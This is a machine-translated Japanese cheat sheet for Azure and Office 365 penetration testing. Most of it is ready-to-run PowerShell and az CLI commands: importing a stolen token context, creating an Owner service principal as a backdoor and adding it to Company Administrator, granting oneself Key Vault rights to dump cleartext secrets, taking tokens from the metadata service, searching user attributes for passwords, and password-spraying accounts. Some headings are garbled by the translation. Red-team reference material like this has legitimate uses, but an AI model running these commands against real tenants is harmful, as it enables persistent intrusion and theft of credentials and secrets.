アジュール貫通試験

マイクロソフトとAzure & O 365 CLIツールシート
ボーBullockによって

パワーシェルモジュール

Import-Module Az

認証

Connect-AzAccount

## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-AzAccount -Credential $credential

コンテキストファイルのインポート

Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'

コンテキストファイルのエクスポート

Save-AzContext -Path C:\Temp\AzureAccessToken.json

アカウント情報
現在のazureコンテキストを一覧表示する

Get-AzContext -ListAvailable

コンテキスト詳細を取得する

$context = Get-AzContext
$context.Name
$context.Account

リスト購読

Get-AzSubscription

サブスクリプションを選択

Select-AzSubscription -SubscriptionID "SubscriptionID"

現在のユーザのロール割り当てを取得する

Get-AzRoleAssignment

すべてのリソースとリソースグループのリスト

Get-AzResource
Get-AzResourceGroup

リストストレージアカウント

Get-AzStorageAccount

webappsとSQL
Azure Webアプリケーションの一覧

Get-AzAdApplication
Get-AzWebApp

リストSQLサーバ

Get-AzSQLServer

個々のデータベースは、前のコマンド

Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName

ファイアウォール規則

Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName $ResourceGroupName

リストSQLサーバ

Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName

ルーンブック
ルアーブック

Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>

Runbookをエクスポートします.

Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\

仮想マシン
リストのVMSと

Get-AzVM
$vm = Get-AzVM -Name "VM Name" 
$vm.OSProfile

VMSでコマンドを実行する

Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1

ネットワーキング
リスト仮想ネットワーク

Get-AzVirtualNetwork

仮想NICに割り当てられたリスト

Get-AzPublicIpAddress

Azure Expressroute ( VPN )情報を取得する

Get-AzExpressRouteCircuit

裏口
新しいAzureサービスプリンシパルをバックドアとして作成する

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant “tenant ID" -ServicePrincipal

パワーシェルモジュール

Import-Module MSOnline

認証

Connect-MsolService

## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-MsolService -Credential $credential

アカウントとディレクトリ情報
リスト会社情報

Get-MSolCompanyInformation

リストのすべてのユーザー

Get-MSolUser -All

リストのグループ

Get-MSolGroup -All

グループのメンバー(この場合のグローバル管理者)

Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember –GroupObjectId $GUID

ユーザー属性一覧

Get-MSolUser –All | fl

リストサービスプリンシパル

Get-MsolServicePrincipal

パスワードのすべてのazure広告ユーザー属性を検索するライナー

$users = Get-MsolUser; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}} 

AZ CLIツール

認証

az login

アダムキー保管庫をダンプする
現在のアカウントが表示できる任意のキーVaultリソースを一覧表示

az keyvault list –query '[].name' --output tsv 

貢献者レベルのアクセスを自分で秘密を取得する権利の許可を与えることができます.

az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list 

キーVaultのURIを取得する

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv 

KeyVaultからクリアテキストの秘密を取得する

az keyvault secret show --id <URI from last command> | ConvertFrom-Json

メタデータサービスURL

http://169.254.169.254/metadata

メタデータサービスからアクセストークンを取得する

GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true

その他のAzure & O 365ツール

マイクロバースト
セキュリティ評価ツール
https://github.com/NetSPI/MicroBurst
オープンストレージブロックを探す

Invoke-EnumerateAzureBlobs -Base $BaseName 

エクスポートSSL/TLS

Get-AzPasswords -ExportCerts Y

コンテナ・ダンプ

Get-AzPasswords
Get-AzACR

パワーザール
セキュリティ評価ツール
https://github.com/hausec/PowerZure

ロードツール
フレームワークAzure広告との対話
https://github.com/dirkjanm/ROADtools

ストームポット
AzureとAzure広告オブジェクトをグラフ化するためのレッドチームツール
https://github.com/Azure/Stormspotter

msolスプレー
パスワードスプレーAzure/O 365へのツール
https://github.com/dafthack

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020